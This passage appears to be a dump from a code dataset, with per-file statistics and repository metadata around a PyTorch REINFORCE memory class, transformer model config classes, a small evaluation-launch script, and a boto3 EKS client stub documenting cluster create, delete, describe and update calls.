        self, rollout_size, obs_size_x, obs_size_y, obs_size_z, obs_channel, device
    ):
        """
        Initializes the memory for the reinforce algorithm for 3d stacked frames
        @params
            rollout_size the maximum rollout size
            obs_size_x the x size of the observation
            obs_size_y the y size of the observation
            obs_size_z the z size of the observation
            obs_channel the number of channels in the observation
            device the device used in the models
        """
        self.rollout_size = rollout_size
        self.obs_size_x = obs_size_x
        self.obs_size_y = obs_size_y
        self.obs_size_z = obs_size_z
        self.obs_channel = obs_channel
        self.device = device
        self.reset()

    def insert(self, step, done, action, log_prob, reward, obs):
        """
        Inserts new data in the memory
        @params:
            step the current step
            done true if the state is terminal
            action the used action
            log_prob the logarithmic probability of the action
            reward the received reward
            obs the observation to insert
        """
        self.done[step].copy_(done)
        self.actions[step].copy_(action)
        self.log_probs[step].copy_(log_prob)
        self.rewards[step].copy_(reward)
        self.obs[step].copy_(obs)
        self.obs[step] = self.obs[step].to(self.device)

    def reset(self):
        """
        Resets the memory
        """
        self.done = torch.zeros(self.rollout_size, 1)
        self.returns = torch.zeros(self.rollout_size + 1, 1, requires_grad=False)
        self.actions = torch.zeros(self.rollout_size, 1, dtype=torch.int64)
        self.log_probs = torch.zeros(self.rollout_size, 1)
        self.rewards = torch.zeros(self.rollout_size, 1)
        self.obs = torch.zeros(
            self.rollout_size,
            self.obs_channel,
            self.obs_size_z,
            self.obs_size_x,
            self.obs_size_y,
        )
        self.obs = self.obs.to(self.device)

    def compute_returns(self, gamma):
        """
        Computes the returns for each episode
        @params:
            gamma the discount factor
        """
        self.last_done = (self.done == 1).nonzero().max()
        self.returns[self.last_done + 1] = 0.0
        for step in reversed(range(self.last_done + 1)):
            self.returns[step] = (
                self.returns[step + 1] * gamma * (1 - self.done[step])
                + self.rewards[step]
            )

    def batch_sampler(self, batch_size):
        """
        Samples a batch with the data
        @params:
            batch_size the size of the requested batch
        """
        sampler = BatchSampler(
            SubsetRandomSampler(range(self.last_done)), batch_size, drop_last=True
        )
        for indices in sampler:
            yield self.actions[indices], self.returns[indices], self.obs[indices]
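A rough driver loop for MemoryReinforce; the rollout length, observation size, and dummy transition values below are assumptions for illustration, not taken from the repository.

import torch

# Hypothetical sizes for a 1-channel 8x8 grid observation.
memory = MemoryReinforce(rollout_size=16, obs_size_x=8, obs_size_y=8,
                         obs_channel=1, device=torch.device('cpu'))

for step in range(16):
    memory.insert(
        step,
        done=torch.tensor([1.0 if step == 15 else 0.0]),  # terminal on last step
        action=torch.tensor([0], dtype=torch.int64),
        log_prob=torch.tensor([0.0]),
        reward=torch.tensor([1.0]),
        obs=torch.zeros(1, 8, 8),
    )

memory.compute_returns(gamma=0.99)
for actions, returns, obs in memory.batch_sampler(batch_size=4):
    pass  # a REINFORCE policy update per batch would go here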
35.818182
102
0.573604
778
6,304
4.48072
0.142674
0.056225
0.068847
0.072289
0.933161
0.929432
0.928285
0.928285
0.928285
0.928285
0
0.009615
0.323604
6,304
175
103
36.022857
0.807927
0.281885
0
0.758621
0
0
0
0
0
0
0
0
0
1
0.114943
false
0
0.022989
0
0.16092
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
597c0be9050aedf8c865e321505d43e678daa97b
2,393
py
Python
TorchFly/torchfly/nn/transformers/model_configs.py
mrazizi/TextGAIL
9b6e0e62669e0bd4fbb1a8b64098c8432b0d725d
[ "MIT" ]
19
2020-05-16T23:13:43.000Z
2022-03-08T15:01:48.000Z
TorchFly/torchfly/nn/transformers/model_configs.py
MarkusSagen/TextGAIL
18ba72c6d63c3c3db1f195d118267c6e8243b4ff
[ "MIT" ]
3
2021-06-08T21:07:12.000Z
2021-12-13T20:41:53.000Z
TorchFly/torchfly/nn/transformers/model_configs.py
MarkusSagen/TextGAIL
18ba72c6d63c3c3db1f195d118267c6e8243b4ff
[ "MIT" ]
10
2020-06-09T09:15:14.000Z
2022-03-20T09:36:30.000Z
import torch


class ChineseBERTBaseConfig:
    attention_dropout_prob = 0.1
    hidden_dropout_prob = 0.1
    hidden_size = 768
    num_attention_heads = 12
    num_hidden_layers = 12
    intermediate_size = 3072
    layer_norm_eps = 1e-05
    max_position_embeddings = 512
    vocab_size = 21128
    type_vocab_size = 2


class UnifiedRobertaBaseConfig:
    attention_dropout_prob = 0.1
    hidden_dropout_prob = 0.1
    hidden_size = 768
    num_attention_heads = 12
    num_hidden_layers = 12
    intermediate_size = 3072
    layer_norm_eps = 1e-05
    max_position_embeddings = 514
    # potentially remove it
    output_attentions = False
    output_hidden_states = False
    vocab_size = 50265
    padding_idx = 1
    type_vocab_size = 1
    padding_value = 1


class UnifiedGPT2MediumConfig:
    vocab_size = 50265
    n_positions = 1024
    n_ctx = 1024
    n_embd = 1024
    n_layer = 24
    n_head = 16
    resid_pdrop = 0.1
    embd_pdrop = 0.1
    attn_pdrop = 0.1
    layer_norm_epsilon = 1e-5
    initializer_range = 0.02
    gradient_checkpointing = True
    padding_value = 1


class UnifiedGPT2SmallConfig:
    vocab_size = 50265
    n_positions = 1024
    n_ctx = 1024
    n_embd = 768
    n_layer = 12
    n_head = 12
    resid_pdrop = 0.1
    embd_pdrop = 0.1
    attn_pdrop = 0.1
    layer_norm_epsilon = 1e-5
    initializer_range = 0.02
    gradient_checkpointing = False
    padding_value = 1


class UnifiedGPT2LargeConfig:
    vocab_size = 50265
    n_positions = 1024
    n_ctx = 1024
    n_embd = 1280
    n_layer = 36
    n_head = 20
    resid_pdrop = 0.1
    embd_pdrop = 0.1
    attn_pdrop = 0.1
    layer_norm_epsilon = 1e-5
    initializer_range = 0.02
    gradient_checkpointing = True
    padding_value = 1


class UnifiedGPT2XLConfig:
    vocab_size = 50265
    n_positions = 1024
    n_ctx = 1024
    n_embd = 1600
    n_layer = 48
    n_head = 25
    resid_pdrop = 0.1
    embd_pdrop = 0.1
    attn_pdrop = 0.1
    layer_norm_epsilon = 1e-5
    initializer_range = 0.02
    gradient_checkpointing = True
    padding_value = 1


class UnifiedGPT2DistillConfig:
    vocab_size = 50265
    n_positions = 1024
    n_ctx = 1024
    n_embd = 768
    n_layer = 6
    n_head = 12
    resid_pdrop = 0.1
    embd_pdrop = 0.1
    attn_pdrop = 0.1
    layer_norm_epsilon = 1e-5
    initializer_range = 0.02
    gradient_checkpointing = True
    padding_value = 1
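Because these configs expose hyperparameters as plain class attributes, a consumer can read them without instantiation; a trivial illustrative sketch:

config = UnifiedGPT2SmallConfig
print(config.vocab_size, config.n_embd, config.n_layer, config.n_head)  # 50265 768 12 12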
22.157407
34
0.669035
337
2,393
4.4273
0.222552
0.025469
0.070375
0.060322
0.72319
0.72319
0.72319
0.72319
0.72319
0.72319
0
0.128976
0.277476
2,393
107
35
22.364486
0.73395
0.008776
0
0.71134
0
0
0
0
0
0
0
0
0
1
0
false
0
0.010309
0
1
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7
59c98367bed11fb50c56115c7b7363396d14a2c6
545
py
Python
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
import os

ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_PiecewiseAffine.yml",
    "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_PiecewiseAffine.yml",
    "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_PiecewiseAffine.yml",
    "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_PiecewiseAffine.yml",
    "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_PiecewiseAffine.yml",
]

for l in ls:
    os.system(l)
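The script above drives each run through os.system; a subprocess-based variant (a substitution of mine, not from the repository) would stop on the first failing run:

import subprocess

for cmd in ls:
    subprocess.run(cmd.split(), check=True)  # raises CalledProcessError on a non-zero exit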
49.545455
103
0.847706
80
545
5.4
0.3
0.115741
0.138889
0.219907
0.884259
0.884259
0.884259
0.884259
0.884259
0.884259
0
0.038911
0.056881
545
11
104
49.545455
0.801556
0
0
0
0
0
0.879121
0.650183
0
0
0
0
0
1
0
false
0
0.111111
0
0.111111
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
ab6884debfde7f8228e6d1ee6e45544b238042ad
56,059
py
Python
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
119
2018-12-01T18:20:57.000Z
2022-02-02T10:31:29.000Z
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
15
2018-11-16T00:16:44.000Z
2021-11-13T03:44:18.000Z
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
11
2019-05-06T05:26:51.000Z
2021-09-28T15:27:59.000Z
from typing import Optional from botocore.client import BaseClient from botocore.waiter import Waiter from typing import Union from typing import Dict from botocore.paginate import Paginator class Client(BaseClient): def can_paginate(self, operation_name: str = None): """ Check if an operation can be paginated. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is ``create_foo``, and you\'d normally invoke the operation as ``client.create_foo(**kwargs)``, if the ``create_foo`` operation can be paginated, you can use the call ``client.get_paginator(\"create_foo\")``. :return: ``True`` if the operation can be paginated, ``False`` otherwise. """ pass def create_cluster(self, name: str, roleArn: str, resourcesVpcConfig: Dict, version: str = None, logging: Dict = None, clientRequestToken: str = None) -> Dict: """ Creates an Amazon EKS control plane. The Amazon EKS control plane consists of control plane instances that run the Kubernetes software, like ``etcd`` and the API server. The control plane runs in an account managed by AWS, and the Kubernetes API is exposed via the Amazon EKS API server endpoint. Each Amazon EKS cluster control plane is single-tenant and unique, and runs on its own set of Amazon EC2 instances. The cluster control plane is provisioned across multiple Availability Zones and fronted by an Elastic Load Balancing Network Load Balancer. Amazon EKS also provisions elastic network interfaces in your VPC subnets to provide connectivity from the control plane instances to the worker nodes (for example, to support ``kubectl exec`` , ``logs`` , and ``proxy`` data flows). Amazon EKS worker nodes run in your AWS account and connect to your cluster's control plane via the Kubernetes API server endpoint and a certificate file that is created for your cluster. You can use the ``endpointPublicAccess`` and ``endpointPrivateAccess`` parameters to enable or disable public and private access to your cluster's Kubernetes API server endpoint. By default, public access is enabled and private access is disabled. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . You can use the ``logging`` parameter to enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . Cluster creation typically takes between 10 and 15 minutes. After you create an Amazon EKS cluster, you must configure your Kubernetes tooling to communicate with the API server and launch worker nodes into your cluster. For more information, see `Managing Cluster Authentication <https://docs.aws.amazon.com/eks/latest/userguide/managing-auth.html>`__ and `Launching Amazon EKS Worker Nodes <https://docs.aws.amazon.com/eks/latest/userguide/launch-workers.html>`__ in the *Amazon EKS User Guide* . 
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/CreateCluster>`_ **Request Syntax** :: response = client.create_cluster( name='string', version='string', roleArn='string', resourcesVpcConfig={ 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, logging={ 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, clientRequestToken='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of your new cluster. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. - *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. 
- *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The unique name to give to your cluster. :type version: string :param version: The desired Kubernetes version for your cluster. If you do not specify a value here, the latest version available in Amazon EKS is used. :type roleArn: string :param roleArn: **[REQUIRED]** The Amazon Resource Name (ARN) of the IAM role that provides permissions for Amazon EKS to make calls to other AWS API operations on your behalf. For more information, see `Amazon EKS Service IAM Role <https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html>`__ in the * *Amazon EKS User Guide* * . :type resourcesVpcConfig: dict :param resourcesVpcConfig: **[REQUIRED]** The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . You must specify at least two subnets. You may specify up to five security groups, but we recommend that you use a dedicated security group for your cluster control plane. - **subnetIds** *(list) --* Specify subnets for your Amazon EKS worker nodes. Amazon EKS creates cross-account elastic network interfaces in these subnets to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **securityGroupIds** *(list) --* Specify one or more security groups for the cross-account elastic network interfaces that Amazon EKS creates to use to allow communication between your worker nodes and the Kubernetes control plane. If you do not specify a security group, the default security group for your VPC is used. - *(string) --* - **endpointPublicAccess** *(boolean) --* Set this value to ``false`` to disable public access for your cluster\'s Kubernetes API server endpoint. If you disable public access, your cluster\'s Kubernetes API server can only receive requests from within the cluster VPC. The default value for this parameter is ``true`` , which enables public access for your Kubernetes API server. 
For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . - **endpointPrivateAccess** *(boolean) --* Set this value to ``true`` to enable private access for your cluster\'s Kubernetes API server endpoint. If you enable private access, Kubernetes API requests from within your cluster\'s VPC will use the private VPC endpoint. The default value for this parameter is ``false`` , which disables private access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . :type logging: dict :param logging: Enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass def delete_cluster(self, name: str) -> Dict: """ Deletes the Amazon EKS cluster control plane. .. note:: If you have active services in your cluster that are associated with a load balancer, you must delete those services before deleting the cluster so that the load balancers are deleted properly. Otherwise, you can have orphaned resources in your VPC that prevent you from being able to delete the VPC. For more information, see `Deleting a Cluster <https://docs.aws.amazon.com/eks/latest/userguide/delete-cluster.html>`__ in the *Amazon EKS User Guide* . 
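An illustrative deletion sketch (delete any load-balancer-backed Kubernetes services with your Kubernetes tooling first; the ``ResourceNotFoundException`` attribute on ``client.exceptions`` is an assumption) ::

    import time

    client.delete_cluster(name='my-cluster')
    # Poll until deletion completes; describe_cluster is expected to raise
    # once the cluster no longer exists.
    while True:
        try:
            client.describe_cluster(name='my-cluster')
        except client.exceptions.ResourceNotFoundException:
            break
        time.sleep(30)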
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DeleteCluster>`_ **Request Syntax** :: response = client.delete_cluster( name='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of the cluster to delete. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. - *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. 
Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The name of the cluster to delete. :rtype: dict :returns: """ pass def describe_cluster(self, name: str) -> Dict: """ Returns descriptive information about an Amazon EKS cluster. The API server endpoint and certificate authority data returned by this operation are required for ``kubelet`` and ``kubectl`` to communicate with your Kubernetes API server. For more information, see `Create a kubeconfig for Amazon EKS <https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html>`__ . .. note:: The API server endpoint and certificate authority data are not available until the cluster reaches the ``ACTIVE`` state. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DescribeCluster>`_ **Request Syntax** :: response = client.describe_cluster( name='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of your specified cluster. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. 
- *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The name of the cluster to describe. :rtype: dict :returns: """ pass def describe_update(self, name: str, updateId: str) -> Dict: """ Returns descriptive information about an update against your Amazon EKS cluster. When the status of the update is ``Succeeded`` , the update is complete. If an update fails, the status is ``Failed`` , and an error detail explains the reason for the failure. 
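A small polling sketch (the update ID, cluster name, and sleep interval are placeholders) ::

    import time

    update_id = '...'  # returned by update_cluster_config or update_cluster_version
    while True:
        update = client.describe_update(name='my-cluster', updateId=update_id)['update']
        if update['status'] != 'InProgress':
            break
        time.sleep(15)
    if update['status'] == 'Failed':
        for error in update['errors']:
            print(error['errorCode'], error['errorMessage'])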
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DescribeUpdate>`_ **Request Syntax** :: response = client.describe_update( name='string', updateId='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* The full description of the specified update. - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type updateId: string :param 